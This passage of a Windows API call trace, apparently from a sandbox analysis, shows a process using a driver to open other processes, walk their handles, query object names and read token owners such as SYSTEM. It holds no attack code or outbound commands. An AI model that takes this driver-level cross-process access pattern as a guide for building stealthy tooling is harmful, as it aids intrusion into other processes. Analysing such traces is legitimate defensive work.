HandleInformation=0x0) returned 0x0 [0289.786] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.786] PsReleaseProcessExitSynchronization () returned 0x2 [0289.786] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x4001a [0289.786] ObQueryNameString (in: Object=0xffffe000697cf540, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.786] ObfDereferenceObject (Object=0xffffe000697cf540) returned 0x7ffd [0289.786] IoCompleteRequest () returned 0x0 [0289.786] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.786] PsAcquireProcessExitSynchronization () returned 0x0 [0289.786] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.786] ObReferenceObjectByHandle (in: Handle=0x220, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697cf200, HandleInformation=0x0) returned 0x0 [0289.786] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.786] PsReleaseProcessExitSynchronization () returned 0x2 [0289.786] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40019 [0289.786] ObQueryNameString (in: Object=0xffffe000697cf200, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.786] ObfDereferenceObject (Object=0xffffe000697cf200) returned 0x7ffd [0289.786] IoCompleteRequest () returned 0x0 [0289.786] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.786] PsAcquireProcessExitSynchronization () returned 0x0 [0289.786] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.786] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697d4f20, HandleInformation=0x0) returned 0x0 [0289.786] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.786] PsReleaseProcessExitSynchronization () returned 0x2 [0289.786] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40018 [0289.787] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.787] ObfDereferenceObject (Object=0xffffe000697d4f20) returned 0x7fff [0289.787] IoCompleteRequest () returned 0x0 [0289.787] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.787] PsAcquireProcessExitSynchronization () returned 0x0 [0289.787] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.787] ObReferenceObjectByHandle (in: Handle=0x230, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697d4db0, HandleInformation=0x0) returned 0x0 [0289.787] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.787] PsReleaseProcessExitSynchronization () returned 0x2 [0289.787] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40017 [0289.787] ObQueryNameString (in: Object=0xffffe000697d4db0, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.787] ObfDereferenceObject (Object=0xffffe000697d4db0) returned 0x7ffd [0289.787] IoCompleteRequest () returned 0x0 [0289.787] PsLookupProcessByProcessId (in: ProcessId=0x26c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.787] PsAcquireProcessExitSynchronization () returned 0x0 [0289.787] KeStackAttachProcess (in: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000697bb840, ApcState=0xffffd000ac0cf400) [0289.787] ObReferenceObjectByHandle (in: Handle=0x234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697d5f20, HandleInformation=0x0) returned 0x0 [0289.787] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.787] PsReleaseProcessExitSynchronization () returned 0x2 [0289.787] ObfDereferenceObject (Object=0xffffe000697bb840) returned 0x40016 [0289.787] ObQueryNameString (in: Object=0xffffe000697d5f20, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.787] ObfDereferenceObject (Object=0xffffe000697d5f20) returned 0x7ffd [0289.787] IoCompleteRequest () returned 0x0 [0289.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2d8) returned 0x188 [0289.787] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.787] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006980e200, HandleInformation=0x0) returned 0x0 [0289.787] ObOpenObjectByPointer (in: Object=0xffffe0006980e200, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80001040) returned 0x0 [0289.787] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x400a6 [0289.787] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80001040, DesiredAccess=0x8, TokenHandle=0xffffe00069ee0a40 | out: TokenHandle=0xffffe00069ee0a40*=0x18c) returned 0x0 [0289.787] ZwClose (Handle=0xffffffff80001040) returned 0x0 [0289.787] IoCompleteRequest () returned 0x0 [0289.787] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.787] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5a, [1]=0x0, [2]=0x0)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="DWM-1", cchName=0x14d3c0, ReferencedDomainName="Window Manager", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.788] CloseHandle (hObject=0x18c) returned 1 [0289.788] CloseHandle (hObject=0x188) returned 1 [0289.788] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.788] PsAcquireProcessExitSynchronization () returned 0x0 [0289.788] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400) [0289.788] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698204e0, HandleInformation=0x0) returned 0x0 [0289.788] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.788] PsReleaseProcessExitSynchronization () returned 0x2 [0289.788] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380a4 [0289.788] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a2a0044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a0044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.788] ObfDereferenceObject (Object=0xffffe000698204e0) returned 0x7ffe [0289.788] IoCompleteRequest () returned 0x0 [0289.788] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.789] PsAcquireProcessExitSynchronization () returned 0x0 [0289.789] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400) [0289.789] ObReferenceObjectByHandle (in: Handle=0x90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069701d10, HandleInformation=0x0) returned 0x0 [0289.789] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.789] PsReleaseProcessExitSynchronization () returned 0x2 [0289.789] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380a3 [0289.789] ObQueryNameString (in: Object=0xffffe00069701d10, ObjectNameInfo=0xffffe0006a2c5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2c5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.789] ObfDereferenceObject (Object=0xffffe00069701d10) returned 0x800e [0289.789] IoCompleteRequest () returned 0x0 [0289.789] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.789] PsAcquireProcessExitSynchronization () returned 0x0 [0289.789] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400) [0289.789] ObReferenceObjectByHandle (in: Handle=0x2a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698393d0, HandleInformation=0x0) returned 0x0 [0289.789] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.789] PsReleaseProcessExitSynchronization () returned 0x2 [0289.789] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380a2 [0289.789] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.789] ObfDereferenceObject (Object=0xffffe000698393d0) returned 0x7ffe [0289.789] IoCompleteRequest () returned 0x0 [0289.789] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.789] PsAcquireProcessExitSynchronization () returned 0x0 [0289.789] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400) [0289.789] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069835b90, HandleInformation=0x0) returned 0x0 [0289.789] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.789] PsReleaseProcessExitSynchronization () returned 0x2 [0289.789] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380a1 [0289.789] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.789] ObfDereferenceObject (Object=0xffffe00069835b90) returned 0x7ffe [0289.789] IoCompleteRequest () returned 0x0 [0289.789] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.789] PsAcquireProcessExitSynchronization () returned 0x0 [0289.789] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400) [0289.789] ObReferenceObjectByHandle (in: Handle=0x3a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a14f20, HandleInformation=0x0) returned 0x0 [0289.789] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.789] PsReleaseProcessExitSynchronization () returned 0x2 [0289.789] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x380a0 [0289.789] ObQueryNameString (in: Object=0xffffe00069a14f20, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.789] ObfDereferenceObject (Object=0xffffe00069a14f20) returned 0x800a [0289.789] IoCompleteRequest () returned 0x0 [0289.789] PsLookupProcessByProcessId (in: ProcessId=0x2d8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.789] PsAcquireProcessExitSynchronization () returned 0x0 [0289.789] KeStackAttachProcess (in: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006980e200, ApcState=0xffffd000ac0cf400) [0289.789] ObReferenceObjectByHandle (in: Handle=0x3f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a348620, HandleInformation=0x0) returned 0x0 [0289.789] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.790] PsReleaseProcessExitSynchronization () returned 0x2 [0289.790] ObfDereferenceObject (Object=0xffffe0006980e200) returned 0x3809f [0289.790] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.790] ObfDereferenceObject (Object=0xffffe0006a348620) returned 0x7ffc [0289.790] IoCompleteRequest () returned 0x0 [0289.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x318) returned 0x188 [0289.790] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.790] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000698383c0, HandleInformation=0x0) returned 0x0 [0289.790] ObOpenObjectByPointer (in: Object=0xffffe000698383c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80001040) returned 0x0 [0289.790] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x881e3 [0289.790] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80001040, DesiredAccess=0x8, TokenHandle=0xffffe00069ee0a40 | out: TokenHandle=0xffffe00069ee0a40*=0x18c) returned 0x0 [0289.790] ZwClose (Handle=0xffffffff80001040) returned 0x0 [0289.790] IoCompleteRequest () returned 0x0 [0289.790] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.790] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.791] CloseHandle (hObject=0x18c) returned 1 [0289.791] CloseHandle (hObject=0x188) returned 1 [0289.791] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.791] PsAcquireProcessExitSynchronization () returned 0x0 [0289.791] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.791] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006983bc00, HandleInformation=0x0) returned 0x0 [0289.791] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.791] PsReleaseProcessExitSynchronization () returned 0x2 [0289.791] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e1 [0289.791] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4cf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4cf7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.791] ObfDereferenceObject (Object=0xffffe0006983bc00) returned 0x7ffc [0289.791] IoCompleteRequest () returned 0x0 [0289.791] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.791] PsAcquireProcessExitSynchronization () returned 0x0 [0289.791] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.791] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006983f090, HandleInformation=0x0) returned 0x0 [0289.791] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.791] PsReleaseProcessExitSynchronization () returned 0x2 [0289.791] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801e0 [0289.791] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.791] ObfDereferenceObject (Object=0xffffe0006983f090) returned 0x7ffb [0289.791] IoCompleteRequest () returned 0x0 [0289.791] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.791] PsAcquireProcessExitSynchronization () returned 0x0 [0289.791] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.791] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069842090, HandleInformation=0x0) returned 0x0 [0289.791] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.791] PsReleaseProcessExitSynchronization () returned 0x2 [0289.791] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801df [0289.791] ObQueryNameString (in: Object=0xffffe00069842090, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.791] ObfDereferenceObject (Object=0xffffe00069842090) returned 0x800e [0289.791] IoCompleteRequest () returned 0x0 [0289.791] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.791] PsAcquireProcessExitSynchronization () returned 0x0 [0289.792] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.792] ObReferenceObjectByHandle (in: Handle=0x29c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006c570370, HandleInformation=0x0) returned 0x0 [0289.792] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.792] PsReleaseProcessExitSynchronization () returned 0x2 [0289.792] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801de [0289.792] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.792] ObfDereferenceObject (Object=0xffffe0006c570370) returned 0x7ff8 [0289.792] IoCompleteRequest () returned 0x0 [0289.792] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.792] PsAcquireProcessExitSynchronization () returned 0x0 [0289.792] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.792] ObReferenceObjectByHandle (in: Handle=0x35c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006986b5f0, HandleInformation=0x0) returned 0x0 [0289.792] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.792] PsReleaseProcessExitSynchronization () returned 0x2 [0289.792] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801dd [0289.792] ObQueryNameString (in: Object=0xffffe0006986b5f0, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.792] ObfDereferenceObject (Object=0xffffe0006986b5f0) returned 0x7fc3 [0289.792] IoCompleteRequest () returned 0x0 [0289.792] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.792] PsAcquireProcessExitSynchronization () returned 0x0 [0289.792] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.792] ObReferenceObjectByHandle (in: Handle=0x360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698b9ae0, HandleInformation=0x0) returned 0x0 [0289.792] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.792] PsReleaseProcessExitSynchronization () returned 0x2 [0289.792] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801dc [0289.792] ObQueryNameString (in: Object=0xffffe000698b9ae0, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.792] ObfDereferenceObject (Object=0xffffe000698b9ae0) returned 0x7ff6 [0289.792] IoCompleteRequest () returned 0x0 [0289.792] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.792] PsAcquireProcessExitSynchronization () returned 0x0 [0289.792] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.792] ObReferenceObjectByHandle (in: Handle=0x404, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698bf2a0, HandleInformation=0x0) returned 0x0 [0289.792] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.792] PsReleaseProcessExitSynchronization () returned 0x2 [0289.792] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801db [0289.792] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.792] ObfDereferenceObject (Object=0xffffe000698bf2a0) returned 0x7ff7 [0289.792] IoCompleteRequest () returned 0x0 [0289.792] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.792] PsAcquireProcessExitSynchronization () returned 0x0 [0289.792] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.792] ObReferenceObjectByHandle (in: Handle=0x408, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698c0c40, HandleInformation=0x0) returned 0x0 [0289.792] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.792] PsReleaseProcessExitSynchronization () returned 0x2 [0289.792] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801da [0289.793] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.793] ObfDereferenceObject (Object=0xffffe000698c0c40) returned 0x7fff [0289.793] IoCompleteRequest () returned 0x0 [0289.793] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.793] PsAcquireProcessExitSynchronization () returned 0x0 [0289.793] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000ac0cf400) [0289.793] ObReferenceObjectByHandle (in: Handle=0x40c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698c0db0, HandleInformation=0x0) returned 0x0 [0289.793] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.793] PsReleaseProcessExitSynchronization () returned 0x2 [0289.793] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x801d9 [0289.793] ObQueryNameString (in: Object=0xffffe000698c0db0, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.793] ObfDereferenceObject (Object=0xffffe000698c0db0) returned 0x7ffd [0289.793] IoCompleteRequest () returned 0x0 [0289.793] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.793] 